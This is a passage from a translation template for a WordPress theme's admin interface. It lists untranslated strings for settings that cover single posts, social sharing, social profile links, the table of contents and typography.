Post pagination on the mobile device." msgstr "" #: backend/panels/single-post.php:426 msgid "Select settings for the single sidebar." msgstr "" #: backend/panels/single-post.php:434 msgid "" "Assign a sidebar if you select a single layout which has the sidebar. You can set an " "individual sidebar for each post in the post editor page." msgstr "" #: backend/panels/single-post.php:442 msgid "" "Select a position for the single sidebar. You can set an individual sidebar position " "for each post in the post editor page." msgstr "" #: backend/panels/single-post.php:450 msgid "" "Enable or disable sticky sidebar feature. This option will only apply to the single " "post." msgstr "" #: backend/panels/single-post.php:472 msgid "Select settings for the entry category." msgstr "" #: backend/panels/single-post.php:480 msgid "Enable or disable entry category info in the single post." msgstr "" #: backend/panels/single-post.php:487 backend/single-metaboxes.php:267 msgid "Primary Category" msgstr "" #: backend/panels/single-post.php:488 msgid "By default, Primary category setting will only apply to the post listing." msgstr "" #: backend/panels/single-post.php:489 msgid "" "Enable this option if you would like to only show the primary category in the single " "post." msgstr "" #: backend/panels/single-post.php:497 msgid "Entry Category Font Size" msgstr "" #: backend/panels/single-post.php:498 msgid "Input a custom font size value (in px) for the single entry category." msgstr "" #: backend/panels/single-post.php:499 msgid "" "This setting will only apply on the desktop devices. Navigate to \"Typography > Entry " "Category\" to set for tablet mobile devices." msgstr "" #: backend/panels/single-post.php:514 msgid "Single Tagline" msgstr "" #: backend/panels/single-post.php:516 msgid "Select a HTML tag for the single tagline to optimize your SEO settings." msgstr "" #: backend/panels/single-post.php:524 msgid "" "To edit the tagline typography, navigate to \"Typography > Headline & Tagline > Single " "Tagline\"." msgstr "" #: backend/panels/single-post.php:529 msgid "HTML Tag" msgstr "" #: backend/panels/single-post.php:530 msgid "Select a HTML tag for the single tagline." msgstr "" #: backend/panels/single-post.php:544 msgid "Highlight Heading" msgstr "" #: backend/panels/single-post.php:545 msgid "Input a heading for the highlights section if it is existing." msgstr "" #: backend/panels/single-post.php:546 msgid "Highlights" msgstr "" #: backend/panels/single-post.php:562 msgid "Select styles, layouts and other settings for the single post meta." msgstr "" #: backend/panels/single-post.php:570 msgid "Entry Meta Settings" msgstr "" #: backend/panels/single-post.php:576 msgid "Big Avatar" msgstr "" #: backend/panels/single-post.php:577 msgid "Enable or disable the author avatars before the entry meta bar." msgstr "" #: backend/panels/single-post.php:586 msgid "Organize how you want the entry meta info to appear in the single post pages." msgstr "" #: backend/panels/single-post.php:593 msgid "Show the \"posted\" text before the single post author meta." msgstr "" #: backend/panels/single-post.php:600 msgid "Author Job" msgstr "" #: backend/panels/single-post.php:601 msgid "Enable or disable the author job info." msgstr "" #: backend/panels/single-post.php:632 backend/panels/single-post.php:638 msgid "Last Updated Date" msgstr "" #: backend/panels/single-post.php:639 msgid "Enable or disable the last updated meta info in the single post." msgstr "" #: backend/panels/single-post.php:646 msgid "Date Format" msgstr "" #: backend/panels/single-post.php:647 msgid "Custom date format for the last updated info." msgstr "" #: backend/panels/single-post.php:661 backend/panels/single-post.php:667 msgid "Reading Time" msgstr "" #: backend/panels/single-post.php:668 msgid "Enable or disable the reading time info in the single post." msgstr "" #: backend/panels/single-post.php:690 msgid "Share on Socials" msgstr "" #: backend/panels/single-post.php:692 msgid "Select socials you would like to show the share button." msgstr "" #: backend/panels/single-post.php:700 msgid "At the Top" msgstr "" #: backend/panels/single-post.php:706 msgid "Top Share Bar" msgstr "" #: backend/panels/single-post.php:707 msgid "" "Enable or disable top share section. This section will display below the single entry " "meta info." msgstr "" #: backend/panels/single-post.php:714 backend/panels/single-post.php:853 #: backend/panels/single-post.php:991 backend/panels/single-post.php:1612 msgid "Colorful Icons" msgstr "" #: backend/panels/single-post.php:715 backend/panels/single-post.php:854 #: backend/panels/single-post.php:992 backend/panels/single-post.php:1613 msgid "Enable or disable color for social icons." msgstr "" #: backend/panels/single-post.php:723 backend/panels/single-post.php:862 #: backend/panels/single-post.php:1000 backend/panels/single-post.php:1633 #: templates/parts.php:591 msgid "Facebook" msgstr "" #: backend/panels/single-post.php:724 backend/panels/single-post.php:863 #: backend/panels/single-post.php:1001 backend/panels/single-post.php:1508 #: backend/panels/single-post.php:1634 msgid "Enable or disable share on Facebook." msgstr "" #: backend/panels/single-post.php:732 backend/panels/single-post.php:871 #: backend/panels/single-post.php:1009 backend/panels/single-post.php:1641 #: templates/parts.php:594 msgid "Twitter" msgstr "" #: backend/panels/single-post.php:733 backend/panels/single-post.php:872 #: backend/panels/single-post.php:1010 backend/panels/single-post.php:1516 #: backend/panels/single-post.php:1642 msgid "Enable or disable share on Twitter." msgstr "" #: backend/panels/single-post.php:741 backend/panels/single-post.php:880 #: backend/panels/single-post.php:1018 backend/panels/single-post.php:1649 #: templates/parts.php:600 msgid "Pinterest" msgstr "" #: backend/panels/single-post.php:742 backend/panels/single-post.php:881 #: backend/panels/single-post.php:1019 backend/panels/single-post.php:1650 msgid "Enable or disable share on Pinterest." msgstr "" #: backend/panels/single-post.php:750 backend/panels/single-post.php:889 #: backend/panels/single-post.php:1027 backend/panels/single-post.php:1657 #: templates/parts.php:648 msgid "WhatsApp" msgstr "" #: backend/panels/single-post.php:751 backend/panels/single-post.php:890 #: backend/panels/single-post.php:1028 backend/panels/single-post.php:1658 msgid "Enable or disable share on WhatsApp." msgstr "" #: backend/panels/single-post.php:759 backend/panels/single-post.php:898 #: backend/panels/single-post.php:1036 backend/panels/single-post.php:1665 #: templates/parts.php:606 msgid "LinkedIn" msgstr "" #: backend/panels/single-post.php:760 backend/panels/single-post.php:899 #: backend/panels/single-post.php:1037 backend/panels/single-post.php:1666 msgid "Enable or disable share on LinkedIn." msgstr "" #: backend/panels/single-post.php:768 backend/panels/single-post.php:907 #: backend/panels/single-post.php:1045 backend/panels/single-post.php:1673 #: templates/parts.php:609 msgid "Tumblr" msgstr "" #: backend/panels/single-post.php:769 backend/panels/single-post.php:908 #: backend/panels/single-post.php:1046 backend/panels/single-post.php:1674 msgid "Enable or disable share on Tumblr." msgstr "" #: backend/panels/single-post.php:777 backend/panels/single-post.php:916 #: backend/panels/single-post.php:1054 backend/panels/single-post.php:1681 #: templates/parts.php:639 msgid "Reddit" msgstr "" #: backend/panels/single-post.php:778 backend/panels/single-post.php:917 #: backend/panels/single-post.php:1055 backend/panels/single-post.php:1524 #: backend/panels/single-post.php:1682 msgid "Enable or disable share on Reddit." msgstr "" #: backend/panels/single-post.php:786 backend/panels/single-post.php:925 #: backend/panels/single-post.php:1063 backend/panels/single-post.php:1689 #: templates/parts.php:642 msgid "Vkontakte" msgstr "" #: backend/panels/single-post.php:787 backend/panels/single-post.php:926 #: backend/panels/single-post.php:1064 backend/panels/single-post.php:1690 msgid "Enable or disable share on Vkontakte." msgstr "" #: backend/panels/single-post.php:795 backend/panels/single-post.php:934 #: backend/panels/single-post.php:1072 backend/panels/single-post.php:1697 #: templates/parts.php:645 msgid "Telegram" msgstr "" #: backend/panels/single-post.php:796 backend/panels/single-post.php:935 #: backend/panels/single-post.php:1073 backend/panels/single-post.php:1698 msgid "Enable or disable share on Telegram." msgstr "" #: backend/panels/single-post.php:805 backend/panels/single-post.php:944 #: backend/panels/single-post.php:1082 backend/panels/single-post.php:1706 msgid "Enable or disable share on Email." msgstr "" #: backend/panels/single-post.php:813 backend/panels/single-post.php:952 #: backend/panels/single-post.php:1090 msgid "Copy Link" msgstr "" #: backend/panels/single-post.php:814 backend/panels/single-post.php:1091 msgid "Enable or disable the copy post link icon." msgstr "" #: backend/panels/single-post.php:822 backend/panels/single-post.php:961 #: backend/panels/single-post.php:1099 backend/panels/single-post.php:1713 msgid "Print" msgstr "" #: backend/panels/single-post.php:823 msgid "Enable or disable the print post button." msgstr "" #: backend/panels/single-post.php:839 msgid "At Bottom of Post Content" msgstr "" #: backend/panels/single-post.php:845 msgid "Bottom Content Share Bar" msgstr "" #: backend/panels/single-post.php:846 msgid "" "Enable or disable the bottom share bar, This section is displayed at below of the post " "content." msgstr "" #: backend/panels/single-post.php:953 msgid "Enable or disable the copy post link button." msgstr "" #: backend/panels/single-post.php:962 backend/panels/single-post.php:1100 #: backend/panels/single-post.php:1714 msgid "Enable or disable the print button." msgstr "" #: backend/panels/single-post.php:975 msgid "Fixed Left Area" msgstr "" #: backend/panels/single-post.php:984 msgid "Enable or disable share on socials at the fixed left section." msgstr "" #: backend/panels/single-post.php:1123 backend/single-metaboxes.php:606 #: backend/single-metaboxes.php:611 msgid "Sponsored Post" msgstr "" #: backend/panels/single-post.php:1125 msgid "Select settings for the sponsored posts." msgstr "" #: backend/panels/single-post.php:1132 msgid "Sponsored Meta Text" msgstr "" #: backend/panels/single-post.php:1133 msgid "Input a meta text for the sponsored posts." msgstr "" #: backend/panels/single-post.php:1134 templates/entry.php:1201 msgid "Sponsored by" msgstr "" #: backend/panels/single-post.php:1139 backend/single-metaboxes.php:648 msgid "Directly Redirect" msgstr "" #: backend/panels/single-post.php:1140 msgid "" "Directly redirect to the sponsored URL when visitors click on the post title in the " "blog listing." msgstr "" #: backend/panels/single-post.php:1156 msgid "Review & Rating" msgstr "" #: backend/panels/single-post.php:1158 msgid "Select options for the review system." msgstr "" #: backend/panels/single-post.php:1164 msgid "Default Review Type" msgstr "" #: backend/panels/single-post.php:1165 msgid "Select a default review type for your website." msgstr "" #: backend/panels/single-post.php:1168 msgid "The Star (1 > 5)" msgstr "" #: backend/panels/single-post.php:1169 msgid "The Score (1 > 10)" msgstr "" #: backend/panels/single-post.php:1175 backend/panels/single-post.php:1219 #: backend/single-metaboxes.php:483 msgid "User Rating in Comments" msgstr "" #: backend/panels/single-post.php:1176 msgid "Enable or disable visitors can rate and review on the post review." msgstr "" #: backend/panels/single-post.php:1180 msgid "Enable without Post Review" msgstr "" #: backend/panels/single-post.php:1187 msgid "Default Review Image" msgstr "" #: backend/panels/single-post.php:1188 msgid "Select a default featured image for the review box." msgstr "" #: backend/panels/single-post.php:1203 msgid "Comments" msgstr "" #: backend/panels/single-post.php:1205 msgid "Select settings for the comment box." msgstr "" #: backend/panels/single-post.php:1212 backend/panels/single-post.php:1473 msgid "Show/Hide Comment Button" msgstr "" #: backend/panels/single-post.php:1213 msgid "Enable or disable the button show/hide comment box in the single post pages." msgstr "" #: backend/panels/single-post.php:1220 msgid "Enable or disable visitors can rate and review all posts in the comment box." msgstr "" #: backend/panels/single-post.php:1224 msgid "Enable for Review Posts" msgstr "" #: backend/panels/single-post.php:1225 msgid "Enable for All Posts" msgstr "" #: backend/panels/single-post.php:1232 msgid "Disable All Comments" msgstr "" #: backend/panels/single-post.php:1233 msgid "This is a global option to disable all comments on posts & page..." msgstr "" #: backend/panels/single-post.php:1249 msgid "Related & Popular" msgstr "" #: backend/panels/single-post.php:1251 msgid "" "Select options for the related and popular section at the footer of the single post " "page." msgstr "" #: backend/panels/single-post.php:1259 msgid "Inline Content Related Box" msgstr "" #: backend/panels/single-post.php:1260 msgid "" "To use the shortcode, read the documentation \"Related Box Shortcode\" for further " "information." msgstr "" #: backend/panels/single-post.php:1266 msgid "Related Shortcode" msgstr "" #: backend/panels/single-post.php:1267 msgid "Input a related shortcode you want to display." msgstr "" #: backend/panels/single-post.php:1268 msgid "" "The setting will not apply to posts have been added shortcode directly into content." msgstr "" #: backend/panels/single-post.php:1275 backend/panels/table-contents.php:141 #: backend/single-metaboxes.php:736 msgid "Display Position" msgstr "" #: backend/panels/single-post.php:1276 msgid "Input a position (after x paragraphs) to display the related bõ." msgstr "" #: backend/panels/single-post.php:1277 msgid "" "The related box will not appear on post have number of paragraph less than this " "setting." msgstr "" #: backend/panels/single-post.php:1297 msgid "Enable or disable the related section at the footer in single post pages." msgstr "" #: backend/panels/single-post.php:1304 msgid "Related Heading" msgstr "" #: backend/panels/single-post.php:1305 msgid "Input a heading for this section. Leave -1 to disable this heading." msgstr "" #: backend/panels/single-post.php:1337 msgid "Select a layout for the blog listing." msgstr "" #: backend/panels/single-post.php:1339 msgid "Small Grid 1 (4 Columns)" msgstr "" #: backend/panels/single-post.php:1340 msgid "Grid 1 (3 Columns)" msgstr "" #: backend/panels/single-post.php:1347 msgid "Posts from Where" msgstr "" #: backend/panels/single-post.php:1348 msgid "What posts should be displayed in the related section." msgstr "" #: backend/panels/single-post.php:1350 msgid "Same Tags & Categories" msgstr "" #: backend/panels/single-post.php:1351 msgid "Same Tags" msgstr "" #: backend/panels/single-post.php:1352 backend/panels/single-post.php:1449 msgid "Same Categories" msgstr "" #: backend/panels/single-post.php:1361 msgid "Number of Posts" msgstr "" #: backend/panels/single-post.php:1362 msgid "Select number of posts to show at once." msgstr "" #: backend/panels/single-post.php:1367 msgid "Pagination Style" msgstr "" #: backend/panels/single-post.php:1368 msgid "Select a pagination type for the related section." msgstr "" #: backend/panels/single-post.php:1371 msgid "Disabled" msgstr "" #: backend/panels/single-post.php:1372 msgid "Next Prev" msgstr "" #: backend/panels/single-post.php:1373 includes/menu.php:244 includes/menu.php:297 #: templates/header/templates.php:701 templates/parts.php:326 msgid "Show More" msgstr "" #: backend/panels/single-post.php:1374 msgid "Infinite Scroll" msgstr "" #: backend/panels/single-post.php:1388 backend/panels/single-post.php:1394 msgid "Popular Section" msgstr "" #: backend/panels/single-post.php:1395 msgid "Enable or disable the popular section in single post pages." msgstr "" #: backend/panels/single-post.php:1403 msgid "Add a ruby template shortcode you would like to in this section.." msgstr "" #: backend/panels/single-post.php:1424 backend/panels/single-post.php:1433 #: backend/single-metaboxes.php:820 msgid "Auto Load Next Posts" msgstr "" #: backend/panels/single-post.php:1426 msgid "Select options for the ajax load next posts feature." msgstr "" #: backend/panels/single-post.php:1434 msgid "" "Enable or disable ajax load next posts when visitors reached end of the post content." msgstr "" #: backend/panels/single-post.php:1441 msgid "Show Continue Reading" msgstr "" #: backend/panels/single-post.php:1442 msgid "Hide a part of content of next posts and show the button to increase page views." msgstr "" #: backend/panels/single-post.php:1450 msgid "Only load posts which has same categories with the current post." msgstr "" #: backend/panels/single-post.php:1458 msgid "" "Assign a special sidebar for all next load posts, Recommended use simple or advert " "content." msgstr "" #: backend/panels/single-post.php:1465 msgid "Hide Sidebar on Mobile" msgstr "" #: backend/panels/single-post.php:1466 msgid "Hide the post sidebar on the mobile device when load next posts." msgstr "" #: backend/panels/single-post.php:1474 msgid "Enable or disable the button show/hide comment box when load next posts." msgstr "" #: backend/panels/single-post.php:1490 backend/panels/single-post.php:1499 msgid "Highlight Shares" msgstr "" #: backend/panels/single-post.php:1492 msgid "Show the popup shares bar when the user highlight text in the post content." msgstr "" #: backend/panels/single-post.php:1500 msgid "Enable or disable the highlight shares feature." msgstr "" #: backend/panels/single-post.php:1507 msgid "Share on Facebook" msgstr "" #: backend/panels/single-post.php:1515 msgid "Share on Twitter" msgstr "" #: backend/panels/single-post.php:1523 msgid "Share on Reddit" msgstr "" #: backend/panels/single-post.php:1542 msgid "The setting below will apply to the single post pages." msgstr "" #: backend/panels/single-post.php:1550 msgid "" "To edit for individual post, navigate to \"Posts > Edit > Post Options > Site Header\"." msgstr "" #: backend/panels/single-post.php:1556 msgid "Select a site header style for the single post." msgstr "" #: backend/panels/single-post.php:1558 msgid "" "The transparent headers is only suitable with layouts: Standard 2, Video 2 and Audio 2." msgstr "" #: backend/panels/single-post.php:1564 msgid "Reading Font Resizer" msgstr "" #: backend/panels/single-post.php:1565 msgid "" "Show a font size icon that give visitors of your site the option to change the font " "size of your text." msgstr "" #: backend/panels/single-post.php:1580 backend/panels/single-post.php:1596 msgid "Sticky Headline" msgstr "" #: backend/panels/single-post.php:1582 msgid "Sticky the single heading and share on socials list when scrolling down." msgstr "" #: backend/panels/single-post.php:1597 msgid "Enable or disable sticky the single post headline (post title)" msgstr "" #: backend/panels/single-post.php:1604 msgid "Show Share Bar" msgstr "" #: backend/panels/single-post.php:1605 msgid "Enable or disable share on socials list in this bar." msgstr "" #: backend/panels/single-post.php:1736 backend/panels/single-post.php:1745 msgid "Reading Indicator" msgstr "" #: backend/panels/single-post.php:1738 msgid "Display the reading indicator bar at the top site." msgstr "" #: backend/panels/single-post.php:1746 msgid "Enable or disable the reading indicator bar." msgstr "" #: backend/panels/single-post.php:1753 msgid "Bar Height" msgstr "" #: backend/panels/single-post.php:1754 msgid "" "Input a custom height value (px) for this bar. Leave blank to set it as the default." msgstr "" #: backend/panels/single-post.php:1761 msgid "Bar Color" msgstr "" #: backend/panels/single-post.php:1762 msgid "Select a background color for this bar." msgstr "" #: backend/panels/socials.php:14 backend/panels/socials.php:22 msgid "Social Profiles" msgstr "" #: backend/panels/socials.php:16 msgid "Adding social profiles for your website." msgstr "" #: backend/panels/socials.php:28 msgid "Facebook URL" msgstr "" #: backend/panels/socials.php:29 backend/panels/socials.php:36 #: backend/panels/socials.php:43 backend/panels/socials.php:50 #: backend/panels/socials.php:56 backend/panels/socials.php:63 #: backend/panels/socials.php:69 backend/panels/socials.php:75 #: backend/panels/socials.php:81 backend/panels/socials.php:87 #: backend/panels/socials.php:93 backend/panels/socials.php:99 #: backend/panels/socials.php:105 backend/panels/socials.php:111 #: backend/panels/socials.php:117 backend/panels/socials.php:123 #: backend/panels/socials.php:129 backend/panels/socials.php:135 #: backend/panels/socials.php:141 backend/panels/socials.php:147 #: backend/panels/socials.php:153 msgid "Input your social profile URL, Leave blank if you want to disable it." msgstr "" #: backend/panels/socials.php:35 msgid "Twitter URL" msgstr "" #: backend/panels/socials.php:42 msgid "Youtube URL " msgstr "" #: backend/panels/socials.php:49 msgid "Instagram URL" msgstr "" #: backend/panels/socials.php:55 msgid "Pinterest URL" msgstr "" #: backend/panels/socials.php:62 msgid "LinkedIn URL" msgstr "" #: backend/panels/socials.php:68 msgid "Tumblr URL " msgstr "" #: backend/panels/socials.php:74 msgid "Flickr URL" msgstr "" #: backend/panels/socials.php:80 msgid "Skype URL" msgstr "" #: backend/panels/socials.php:86 msgid "Snapchat URL" msgstr "" #: backend/panels/socials.php:92 msgid "Myspace URL" msgstr "" #: backend/panels/socials.php:98 msgid "Bloglovin URL" msgstr "" #: backend/panels/socials.php:104 msgid "Digg URL" msgstr "" #: backend/panels/socials.php:110 msgid "Dribbble URL" msgstr "" #: backend/panels/socials.php:116 msgid "Soundcloud URL" msgstr "" #: backend/panels/socials.php:122 msgid "Vimeo URL " msgstr "" #: backend/panels/socials.php:128 msgid "Reddit URL " msgstr "" #: backend/panels/socials.php:134 msgid "VKontakte URL " msgstr "" #: backend/panels/socials.php:140 msgid "Telegram URL " msgstr "" #: backend/panels/socials.php:146 msgid "Whatsapp URL " msgstr "" #: backend/panels/socials.php:152 msgid "Rss URL " msgstr "" #: backend/panels/socials.php:165 msgid "Custom Social Profiles" msgstr "" #: backend/panels/socials.php:177 msgid "Custom social 1 - URL" msgstr "" #: backend/panels/socials.php:178 backend/panels/socials.php:205 #: backend/panels/socials.php:232 msgid "Input your social profile URL." msgstr "" #: backend/panels/socials.php:183 msgid "Custom Social 1 - Name" msgstr "" #: backend/panels/socials.php:184 backend/panels/socials.php:211 #: backend/panels/socials.php:238 msgid "Input the name of the social, for example: facebook, twitter." msgstr "" #: backend/panels/socials.php:189 msgid "Custom Social 1 - Icon" msgstr "" #: backend/panels/socials.php:190 backend/panels/socials.php:217 #: backend/panels/socials.php:244 msgid "Input the name of font icon, for example: \"fab fa-facebook\"." msgstr "" #: backend/panels/socials.php:198 msgid "Custom Social 1 - Color" msgstr "" #: backend/panels/socials.php:199 backend/panels/socials.php:226 #: backend/panels/socials.php:253 msgid "Select a color for this social icon." msgstr "" #: backend/panels/socials.php:204 msgid "Custom social 2 - URL" msgstr "" #: backend/panels/socials.php:210 msgid "Custom Social 2 - Name" msgstr "" #: backend/panels/socials.php:216 msgid "Custom Social 2 - Icon" msgstr "" #: backend/panels/socials.php:225 msgid "Custom Social 2 - Color" msgstr "" #: backend/panels/socials.php:231 msgid "Custom social 3 - URL" msgstr "" #: backend/panels/socials.php:237 msgid "Custom Social 3 - Name" msgstr "" #: backend/panels/socials.php:243 msgid "Custom Social 3 - Icon" msgstr "" #: backend/panels/socials.php:252 msgid "Custom Social 3 - Color" msgstr "" #: backend/panels/table-contents.php:14 backend/single-metaboxes.php:710 msgid "Table of Contents" msgstr "" #: backend/panels/table-contents.php:16 msgid "Select settings for table of contents." msgstr "" #: backend/panels/table-contents.php:23 msgid "Post Type Supported" msgstr "" #: backend/panels/table-contents.php:29 msgid "Support Single Post" msgstr "" #: backend/panels/table-contents.php:30 msgid "Enable or disable the table of content for the single post." msgstr "" #: backend/panels/table-contents.php:36 msgid "Support Single Page" msgstr "" #: backend/panels/table-contents.php:37 msgid "Enable or disable the table of content for the single." msgstr "" #: backend/panels/table-contents.php:50 msgid "Heading Tag Supported" msgstr "" #: backend/panels/table-contents.php:56 msgid "Support H1" msgstr "" #: backend/panels/table-contents.php:57 msgid "" "Support H1 tag, Turn this option off if you would like to exclude H1 tag out of the " "table of contents." msgstr "" #: backend/panels/table-contents.php:63 msgid "Support H2" msgstr "" #: backend/panels/table-contents.php:64 msgid "" "Support H2 tag, Turn this option off if you would like to exclude H2 tag out of the " "table of contents." msgstr "" #: backend/panels/table-contents.php:70 msgid "Support H3" msgstr "" #: backend/panels/table-contents.php:71 msgid "" "Support H3 tag, Turn this option off if you would like to exclude H3 tag out of the " "table of contents." msgstr "" #: backend/panels/table-contents.php:77 msgid "Support H4" msgstr "" #: backend/panels/table-contents.php:78 msgid "" "Support H4 tag, Turn this option off if you would like to exclude H4 tag out of the " "table of contents." msgstr "" #: backend/panels/table-contents.php:84 msgid "Support H5" msgstr "" #: backend/panels/table-contents.php:85 msgid "" "Support H5 tag, Turn this option off if you would like to exclude H5 tag out of the " "table of contents." msgstr "" #: backend/panels/table-contents.php:91 msgid "Support H6" msgstr "" #: backend/panels/table-contents.php:92 msgid "" "Support H6 tag, Turn this option off if you would like to exclude H6 tag out of the " "table of contents." msgstr "" #: backend/panels/table-contents.php:110 backend/single-metaboxes.php:722 msgid "layout" msgstr "" #: backend/panels/table-contents.php:111 msgid "Select a layout for the table of contents." msgstr "" #: backend/panels/table-contents.php:114 backend/single-metaboxes.php:727 msgid "Full Width (2 Columns)" msgstr "" #: backend/panels/table-contents.php:115 backend/single-metaboxes.php:728 msgid "Half Width" msgstr "" #: backend/panels/table-contents.php:116 backend/single-metaboxes.php:729 msgid "Full Width (1 Column)" msgstr "" #: backend/panels/table-contents.php:126 msgid "Input a minimum value for total heading tags to show the table of contents box." msgstr "" #: backend/panels/table-contents.php:132 msgid "Table of Contents Heading" msgstr "" #: backend/panels/table-contents.php:133 msgid "Input the heading for the table of contents box." msgstr "" #: backend/panels/table-contents.php:134 msgid "Contents" msgstr "" #: backend/panels/table-contents.php:142 msgid "Input a position (after x paragraphs) to display the table of contents box." msgstr "" #: backend/panels/table-contents.php:148 msgid "Show Hierarchy" msgstr "" #: backend/panels/table-contents.php:149 msgid "Enable or disable hierarchy for the table of contents box." msgstr "" #: backend/panels/table-contents.php:150 msgid "This setting will not apply to the full width 2 columns layout." msgstr "" #: backend/panels/table-contents.php:156 msgid "Show Number list" msgstr "" #: backend/panels/table-contents.php:157 msgid "Enable or disable the number list items." msgstr "" #: backend/panels/table-contents.php:163 msgid "Smooth Scroll" msgstr "" #: backend/panels/table-contents.php:164 msgid "Enable or disable smooth scroll effect to jumb to the anchor link." msgstr "" #: backend/panels/typography.php:13 msgid "Typography" msgstr "" #: backend/panels/typography.php:27 msgid "Website Body" msgstr "" #: backend/panels/typography.php:30 msgid "" "Select font values for your website. The settings below apply to almost content " "elements on the website." msgstr "" #: backend/panels/typography.php:35 msgid "Body Font" msgstr "" #: backend/panels/typography.php:36 msgid "The settings below apply to almost post and page content on your website." msgstr "" #: backend/panels/typography.php:52 backend/panels/typography.php:98 #: backend/panels/typography.php:147 backend/panels/typography.php:196 #: backend/panels/typography.php:245 backend/panels/typography.php:294 #: backend/panels/typography.php:343 backend/panels/typography.php:392 #: backend/panels/typography.php:441 backend/panels/typography.php:507 #: backend/panels/typography.php:555 backend/panels/typography.php:610 #: backend/panels/typography.php:653 backend/panels/typography.php:729 #: backend/panels/typography.php:786 backend/panels/typography.php:870 #: backend/panels/typography.php:1056 backend/panels/typography.php:1128 msgid "Mobile Font Size" msgstr "" #: backend/panels/typography.php:53 msgid "" "Select a font size (px) for the body on the mobile device (max screen width: 767px), " "Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:59 backend/panels/typography.php:105 #: backend/panels/typography.php:154 backend/panels/typography.php:203 #: backend/panels/typography.php:252 backend/panels/typography.php:301 #: backend/panels/typography.php:350 backend/panels/typography.php:399 #: backend/panels/typography.php:448 backend/panels/typography.php:514 #: backend/panels/typography.php:562 backend/panels/typography.php:617 #: backend/panels/typography.php:660 backend/panels/typography.php:736 #: backend/panels/typography.php:793 backend/panels/typography.php:877 #: backend/panels/typography.php:1063 backend/panels/typography.php:1135 msgid "Tablet Font Size" msgstr "" #: backend/panels/typography.php:60 msgid "" "Select a font size (px) for the body on tablet devices (max screen width: 1024px), " "Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:75 msgid "Entry Excerpt" msgstr "" #: backend/panels/typography.php:78 msgid "Select font sizes for the excerpt in the post listing." msgstr "" #: backend/panels/typography.php:84 msgid "" "You can control the excerpt font sizes in this panel. The font family and other font " "values will base on \"Body Font\" values." msgstr "" #: backend/panels/typography.php:91 msgid "Font Size" msgstr "" #: backend/panels/typography.php:92 msgid "" "Select a font size (px) for the excerpt. Leave this option blank to set the default " "value." msgstr "" #: backend/panels/typography.php:99 msgid "" "Select a font size (px) for the excerpt on mobile devices (max screen width: 767px), " "Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:106 msgid "" "Select a font size (px) for the excerpt on tablet devices (max screen width: 1024px), " "Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:121 msgid "H1 Tag" msgstr "" #: backend/panels/typography.php:124 msgid "" "Select font for the H1 tag. Selecting same font family settings for similar elements " "will optimize for your website speed." msgstr "" #: backend/panels/typography.php:129 msgid "H1 Font" msgstr "" #: backend/panels/typography.php:130 msgid "Select font values for the H1 tag and [ CSS classname: .h1]" msgstr "" #: backend/panels/typography.php:148 backend/panels/typography.php:197 #: backend/panels/typography.php:246 backend/panels/typography.php:295 #: backend/panels/typography.php:344 backend/panels/typography.php:393 msgid "" "Select a font size (px) for this heading tag on mobile devices (max screen width: " "767px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:155 backend/panels/typography.php:204 #: backend/panels/typography.php:253 backend/panels/typography.php:302 #: backend/panels/typography.php:351 backend/panels/typography.php:400 msgid "" "Select a font size (px) for this heading tag on tablet devices (max screen width: " "1024px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:170 msgid "H2 Tag" msgstr "" #: backend/panels/typography.php:173 msgid "" "Select font for the H2 tag. Selecting same font family settings for similar elements " "will optimize for your website speed." msgstr "" #: backend/panels/typography.php:178 msgid "H2 Font" msgstr "" #: backend/panels/typography.php:179 msgid "Select font values for the H2 tag and [ CSS classname: .h2]" msgstr "" #: backend/panels/typography.php:219 msgid "H3 Tag" msgstr "" #: backend/panels/typography.php:222 msgid "" "Select font for the H3 tag. Selecting same font family settings for similar elements " "will optimize for your website speed." msgstr "" #: backend/panels/typography.php:227 msgid "H3 Font" msgstr "" #: backend/panels/typography.php:228 msgid "Select font values for the H3 tag and [ CSS classname: .h3]" msgstr "" #: backend/panels/typography.php:268 msgid "H4 Tag" msgstr "" #: backend/panels/typography.php:271 msgid "" "Select font for the H4 tag. Selecting same font family settings for similar elements " "will optimize for your website speed." msgstr "" #: backend/panels/typography.php:276 msgid "H4 Font" msgstr "" #: backend/panels/typography.php:277 msgid "Select font values for the H4 tag and [ CSS classname: .h4]" msgstr "" #: backend/panels/typography.php:317 msgid "H5 Tag" msgstr "" #: backend/panels/typography.php:320 msgid "" "Select font for the H5 tag. Selecting same font family settings for similar elements " "will optimize for your website speed." msgstr "" #: backend/panels/typography.php:325 msgid "H5 Font" msgstr "" #: backend/panels/typography.php:326 msgid "Select font values for the H5 tag and [ CSS classname: .h5]" msgstr "" #: backend/panels/typography.php:366 msgid "H6 Tag" msgstr "" #: backend/panels/typography.php:369 msgid "" "Select font for the H6 tag. Selecting same font family settings for similar elements " "will optimize for your website speed." msgstr "" #: backend/panels/typography.php:374 msgid "H6 Font" msgstr "" #: backend/panels/typography.php:375 msgid "Select font values for the H6 tag and [ CSS classname: .h6]" msgstr "" #: backend/panels/typography.php:418 msgid "Select font values for the entry category (category icon) in the post listing." msgstr "" #: backend/panels/typography.php:423 msgid "Entry Category Font" msgstr "" #: backend/panels/typography.php:424 msgid "Select font for the entry category element." msgstr "" #: backend/panels/typography.php:442 msgid "" "Select a font size (px) for the entry category element on mobile devices (max screen " "width: 767px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:449 msgid "" "Select a font size (px) for the entry category element on tablet devices (max screen " "width: 1024px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:467 msgid "" "Select font values for the post entry meta. Selecting same font family settings for " "similar elements will optimize for your website speed." msgstr "" #: backend/panels/typography.php:472 msgid "Entry Meta Font" msgstr "" #: backend/panels/typography.php:473 msgid "" "Select font values for entry meta info: date, view, comment... Those options will not " "apply to the author meta." msgstr "" #: backend/panels/typography.php:488 msgid "Important Meta Font" msgstr "" #: backend/panels/typography.php:489 msgid "" "Select font values for the author, category meta, review description and sponsored " "brand." msgstr "" #: backend/panels/typography.php:490 msgid "The font size will use the post entry meta font size setting." msgstr "" #: backend/panels/typography.php:508 msgid "" "Select a font size (px) for entry meta info on mobile devices (max screen width: " "767px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:515 msgid "" "Select a font size (px) for entry meta info on tablet devices (max screen width: " "1024px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:533 msgid "Select font values for the read more button." 